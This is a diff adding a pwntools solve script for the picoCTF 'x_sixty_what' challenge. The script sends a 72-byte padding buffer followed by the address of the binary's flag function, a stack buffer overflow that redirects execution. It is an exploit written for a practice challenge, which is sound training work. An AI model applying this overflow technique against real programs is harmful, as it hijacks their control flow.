pwn/x_sixty_what

pwn/x_sixty_what/solve.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
+  offset = 72 # found with pwndbg
+  print(f"flag: {hex(exe.sym.flag)}")
+  print(p64(exe.sym.flag))
+  payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()